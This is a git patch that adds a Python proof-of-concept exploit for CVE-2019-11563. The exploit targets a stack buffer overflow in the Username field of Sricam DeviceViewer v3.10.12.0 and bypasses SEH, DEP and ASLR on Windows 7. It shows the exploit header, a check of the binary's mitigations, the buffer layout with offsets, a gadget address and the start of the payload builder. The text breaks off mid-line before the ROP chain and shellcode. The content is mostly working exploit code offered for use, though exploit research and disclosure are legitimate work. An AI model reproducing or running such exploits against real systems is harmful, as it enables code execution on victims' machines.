From 7054cee9561519e57814ef08304247376421855b Mon Sep 17 00:00:00 2001 From: VoidSec Date: Fri, 8 May 2020 11:04:24 +0200 Subject: [PATCH] added rop for win 7 --- ...0.py => DeviceViewer_v.3.10.12.0_Win10.py} | 0 .../DeviceViewer_v.3.10.12.0_Win7.py | 138 ++++++++++++++++++ 2 files changed, 138 insertions(+) rename windows/x86/local/DeviceViewer_v.3.10.12.0/{DeviceViewer_v.3.10.12.0.py => DeviceViewer_v.3.10.12.0_Win10.py} (100%) create mode 100644 windows/x86/local/DeviceViewer_v.3.10.12.0/DeviceViewer_v.3.10.12.0_Win7.py diff --git a/windows/x86/local/DeviceViewer_v.3.10.12.0/DeviceViewer_v.3.10.12.0.py b/windows/x86/local/DeviceViewer_v.3.10.12.0/DeviceViewer_v.3.10.12.0_Win10.py similarity index 100% rename from windows/x86/local/DeviceViewer_v.3.10.12.0/DeviceViewer_v.3.10.12.0.py rename to windows/x86/local/DeviceViewer_v.3.10.12.0/DeviceViewer_v.3.10.12.0_Win10.py diff --git a/windows/x86/local/DeviceViewer_v.3.10.12.0/DeviceViewer_v.3.10.12.0_Win7.py b/windows/x86/local/DeviceViewer_v.3.10.12.0/DeviceViewer_v.3.10.12.0_Win7.py new file mode 100644 index 0000000..7095d36 --- /dev/null +++ b/windows/x86/local/DeviceViewer_v.3.10.12.0/DeviceViewer_v.3.10.12.0_Win7.py @@ -0,0 +1,138 @@ +""" +Full title: DeviceViewer (DeviceViewer.exe) v.3.10.12.0 - 'Username' Field Stack Buffer Overlow (SEH) DEP+ASLR Bypass +CVE: CVE-2019-11563 +Exploit Author: Paolo Stagno aka VoidSec - voidsec@voidsec.com - https://voidsec.com +Vendor Homepage: http://www.sricam.com/ +Version: v.3.10.12.0 +Tested on: Windows 7 Pro x86 v.6.1.7601 SP 1 Build 7601 +Category: local exploits +Platform: windows +Usage: DeviceViewer > Login Screen > in the "Username" textarea paste the content of "DeviceViewer_v.3.10.12.0_exploit.txt" and press "Login" + +PS C:\Users\user\Desktop> Import-Module .\Get-PESecurity.psm1 +PS C:\Users\user\Desktop> Get-PESecurity -file "C:\Program Files (x86)\DeviceViewer\DeviceViewer.exe" + +FileName : C:\Program Files (x86)\DeviceViewer\DeviceViewer.exe +ARCH : I386 +DotNET : False +ASLR : True +DEP : True +Authenticode : False +StrongNaming : N/A +SafeSEH : False +ControlFlowGuard : False +HighentropyVA : False +""" +#!/usr/bin/python +import struct + +poc=open("DeviceViewer_v.3.10.12.0_exploit.txt", "w") + +total_size=4000 +offset=264 # ofsset to nSEH +# | buffer (4000) | +# | garbage (254) | nSEH (4) | SEH (4) | rop_nop (320) | rop chain (84) | stack adj (6) | shellcode (371) | filler (4000-len(buff)) | +buf = "" # our buffer +buf += "A"*offset # garbage until we hit nSEH +buf += "BBBB" # nSEH; +# 0x6a0e6a60 : pop esi # pop edi # ret | ascii {PAGE_EXECUTE_READ} [avcodec-54.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\DeviceViewer\avcodec-54.dll) +# buf += struct.pack("